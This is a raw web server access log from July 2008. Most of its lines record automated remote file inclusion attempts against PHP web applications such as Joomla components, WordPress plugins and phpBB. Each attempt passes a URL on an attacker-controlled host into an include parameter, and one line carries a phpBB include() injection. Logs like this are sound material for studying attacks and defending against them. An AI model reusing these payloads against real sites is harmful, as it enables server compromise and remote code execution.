69.64.48.146 - - [29/Jul/2008:10:40:13 -0700] "GET /app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.71.106 - - [29/Jul/2008:10:40:13 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kograko.com.pl/poll/polldata/help01[1].txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.71.106 - - [29/Jul/2008:10:40:14 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kograko.com.pl/poll/polldata/help01[1].txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:40:39 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:40:46 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.20.210 - - [29/Jul/2008:10:40:52 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.pne.de//contenido/cronjobs/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.20.210 - - [29/Jul/2008:10:40:52 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.pne.de//contenido/cronjobs/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.20.210 - - [29/Jul/2008:10:40:52 -0700] "GET /logs/access_080313.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.pne.de//contenido/cronjobs/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.232.71.106 - - [29/Jul/2008:10:41:01 -0700] "GET /logs/access_080315.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kograko.com.pl/poll/polldata/help01[1].txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.20.210 - - [29/Jul/2008:10:41:03 -0700] "GET /logs/access_080118.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.pne.de//contenido/cronjobs/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.232.71.106 - - [29/Jul/2008:10:41:05 -0700] "GET /logs/access_080207.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kograko.com.pl/poll/polldata/help01[1].txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:41:35 -0700] "GET //authentication/errors.php?error=http://lodolo.com/x?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:41:35 -0700] "GET /logs//authentication/errors.php?error=http://lodolo.com/x?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
80.93.56.169 - - [29/Jul/2008:10:41:43 -0700] "GET /logs/access_080315.log/lostpasswd.php?env[include_prefix]=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.33.1.189 - - [29/Jul/2008:10:41:56 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kograko.com.pl/poll/polldata/help01[1].txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.33.1.189 - - [29/Jul/2008:10:41:57 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kograko.com.pl/poll/polldata/help01[1].txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.244.11.20 - - [29/Jul/2008:10:42:19 -0700] "GET /logs/access.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.20.210 - - [29/Jul/2008:10:42:25 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.20.210 - - [29/Jul/2008:10:42:25 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.20.210 - - [29/Jul/2008:10:42:29 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.20.210 - - [29/Jul/2008:10:42:29 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:42:44 -0700] "GET //ecommerce/payment/cybersource.php?path[docroot]=http://lodolo.com/x?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:42:44 -0700] "GET /logs//ecommerce/payment/cybersource.php?path[docroot]=http://lodolo.com/x?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:43:19 -0700] "GET /logs/access.log/errors.php?error=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:43:20 -0700] "GET /errors.php?error=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:10:43:20 -0700] "GET /logs/errors.php?error=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
65.55.211.30 - - [29/Jul/2008:10:43:37 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.30 - - [29/Jul/2008:10:43:37 -0700] "GET /presto/?N=A HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
64.38.20.210 - - [29/Jul/2008:10:43:44 -0700] "GET /logs/access_080118.log%20//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.pne.de//contenido/cronjobs/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
59.115.84.182 - - [29/Jul/2008:10:44:26 -0700] "GET /logs/access_080124.log HTTP/1.0" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:10:44:36 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:44:38 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:44:38 -0700] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:44:38 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:10:44:38 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 200 18611 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [29/Jul/2008:10:44:46 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:10:44:47 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [29/Jul/2008:10:44:49 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 200 18621 "-" "libwww-perl/5.65" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:44:51 -0700] "GET /logs/access_080128.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.213.245.215 - - [29/Jul/2008:10:44:57 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:10:45:14 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.33.1.189 - - [29/Jul/2008:10:45:17 -0700] "GET //embed/day.php?path=http://www.fallauna.com/coprald/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
84.33.1.189 - - [29/Jul/2008:10:45:17 -0700] "GET /logs//embed/day.php?path=http://www.fallauna.com/coprald/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
207.213.245.215 - - [29/Jul/2008:10:45:22 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.37.178 - - [29/Jul/2008:10:45:33 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
204.10.38.130 - - [29/Jul/2008:10:45:46 -0700] "GET /logs/access_080218.log/main.php?pag=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.10.38.130 - - [29/Jul/2008:10:45:47 -0700] "GET /main.php?pag=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.20.210 - - [29/Jul/2008:10:45:49 -0700] "GET /logs/access_080329.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.pne.de//contenido/cronjobs/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.20.210 - - [29/Jul/2008:10:45:49 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.pne.de//contenido/cronjobs/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.20.210 - - [29/Jul/2008:10:45:49 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.pne.de//contenido/cronjobs/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.178.186.224 - - [29/Jul/2008:10:45:49 -0700] "GET /logs/access_080104.log//Neos_Chronos/header.php?base_folder=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
205.178.186.224 - - [29/Jul/2008:10:45:49 -0700] "GET //Neos_Chronos/header.php?base_folder=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.246.46.202 - - [29/Jul/2008:10:45:51 -0700] "GET /logs/access_080104.log//Neos_Chronos/header.php?base_folder=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.246.46.202 - - [29/Jul/2008:10:45:52 -0700] "GET //Neos_Chronos/header.php?base_folder=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
204.10.38.130 - - [29/Jul/2008:10:45:52 -0700] "GET /logs/main.php?pag=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.10.38.130 - - [29/Jul/2008:10:45:55 -0700] "GET /logs/access_080313.log/main.php?pag=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:45:57 -0700] "GET /logs/access_080329.log//modules/4nAlbum/public/displayCategory.php?basepath=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:46:00 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:46:00 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.178.186.224 - - [29/Jul/2008:10:46:08 -0700] "GET /logs/access_080103.log//Neos_Chronos/header.php?base_folder=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
204.10.38.130 - - [29/Jul/2008:10:46:12 -0700] "GET /logs/access_080313.log/index.php?pag=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.10.38.130 - - [29/Jul/2008:10:46:13 -0700] "GET /index.php?pag=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 200 18381 "-" "libwww-perl/5.811" "www.dmulk.com"
204.10.38.130 - - [29/Jul/2008:10:46:13 -0700] "GET /logs/index.php?pag=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.246.46.202 - - [29/Jul/2008:10:46:15 -0700] "GET /logs/access_080103.log//Neos_Chronos/header.php?base_folder=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.195.37.178 - - [29/Jul/2008:10:46:20 -0700] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.dmulk.com"
209.51.219.170 - - [29/Jul/2008:10:46:25 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://shra.net/rar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [29/Jul/2008:10:46:25 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://shra.net/rar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [29/Jul/2008:10:46:25 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://shra.net/rar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.118.110.139 - - [29/Jul/2008:10:46:26 -0700] "GET /logs/access_080528.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.118.110.139 - - [29/Jul/2008:10:46:29 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 200 18535 "-" "libwww-perl/5.803" "www.dmulk.com"
209.51.219.170 - - [29/Jul/2008:10:46:29 -0700] "GET /logs/access_080313.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://shra.net/rar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.118.110.139 - - [29/Jul/2008:10:46:30 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.17.183 - - [29/Jul/2008:10:46:30 -0700] "GET /bikes/dteel/2008_07_05/ HTTP/1.0" 200 992 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.212.179.114 - - [29/Jul/2008:10:46:37 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.mazcotaz.com/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
67.212.179.114 - - [29/Jul/2008:10:46:37 -0700] "GET /logs/errors.php?error=http://www.mazcotaz.com/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
204.10.38.130 - - [29/Jul/2008:10:46:47 -0700] "GET /logs/access_080315.log/main.php?pag=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:10:46:47 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:46:49 -0700] "GET /errors.php?error=http://lodolo.com/x?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:46:49 -0700] "GET /logs/errors.php?error=http://lodolo.com/x?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
205.178.186.224 - - [29/Jul/2008:10:46:51 -0700] "GET /logs/access_080104.log//Neos_Chronos/header.php?base_folder=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.178.186.224 - - [29/Jul/2008:10:46:51 -0700] "GET //Neos_Chronos/header.php?base_folder=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.178.186.224 - - [29/Jul/2008:10:46:51 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:10:46:53 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 200 18605 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:10:46:55 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [29/Jul/2008:10:46:56 -0700] "GET /logs/access_080326.log/errors.php?error=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:10:47:05 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.102.38 - - [29/Jul/2008:10:47:10 -0700] "GET /logs/access_080225.log/errors.php?error=http://manetu.de/cms_demo/contenido/applets/src/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.178.186.224 - - [29/Jul/2008:10:47:11 -0700] "GET /logs/access_080103.log//Neos_Chronos/header.php?base_folder=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.102.38 - - [29/Jul/2008:10:47:11 -0700] "GET /errors.php?error=http://manetu.de/cms_demo/contenido/applets/src/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [29/Jul/2008:10:47:11 -0700] "GET /logs/errors.php?error=http://manetu.de/cms_demo/contenido/applets/src/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.67.119 - - [29/Jul/2008:10:47:11 -0700] "GET /logs/access_080315.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.118.110.139 - - [29/Jul/2008:10:47:13 -0700] "GET /logs/access_080327.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.51.219.170 - - [29/Jul/2008:10:47:14 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://shra.net/rar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [29/Jul/2008:10:47:14 -0700] "GET /logs/access_080313.log//claroline/tracking/userLog.php?rootSys=http://shra.net/rar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [29/Jul/2008:10:47:14 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://shra.net/rar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.212.179.114 - - [29/Jul/2008:10:47:15 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.mazcotaz.com/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
67.212.179.114 - - [29/Jul/2008:10:47:15 -0700] "GET /logs/errors.php?error=http://www.mazcotaz.com/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:47:24 -0700] "GET /errors.php?error=http://lodolo.com/x?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:47:24 -0700] "GET /logs/errors.php?error=http://lodolo.com/x?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:47:29 -0700] "GET //atom.php5?page=http://lodolo.com/x?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:47:29 -0700] "GET /logs//atom.php5?page=http://lodolo.com/x?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
64.38.20.210 - - [29/Jul/2008:10:47:36 -0700] "GET /logs/access_080225.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.pne.de//contenido/cronjobs/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:47:41 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.emark.sk/new/vnc/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:47:42 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.emark.sk/new/vnc/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
74.55.183.82 - - [29/Jul/2008:10:47:48 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rjoos.ch/Reise/images/tOtti/help.txt??? HTTP/1.1" 200 3694 "-" "libwww-perl/5.813" "www.dmulk.com"
209.51.219.170 - - [29/Jul/2008:10:48:19 -0700] "GET /logs/access_080329.log//claroline/tracking/userLog.php?rootSys=http://shra.net/rar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.102.38 - - [29/Jul/2008:10:48:35 -0700] "GET /logs/access_080225.log/errors.php?error=http://manetu.de/cms_demo/contenido/applets/src/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [29/Jul/2008:10:48:35 -0700] "GET /errors.php?error=http://manetu.de/cms_demo/contenido/applets/src/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [29/Jul/2008:10:48:36 -0700] "GET /logs/errors.php?error=http://manetu.de/cms_demo/contenido/applets/src/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.10.38.130 - - [29/Jul/2008:10:48:36 -0700] "GET /logs/access_080218.log/index.php?pag=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.133.102.211 - - [29/Jul/2008:10:48:45 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
213.133.102.211 - - [29/Jul/2008:10:48:45 -0700] "GET /logs/access_080118.log%20//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
213.133.102.211 - - [29/Jul/2008:10:48:48 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
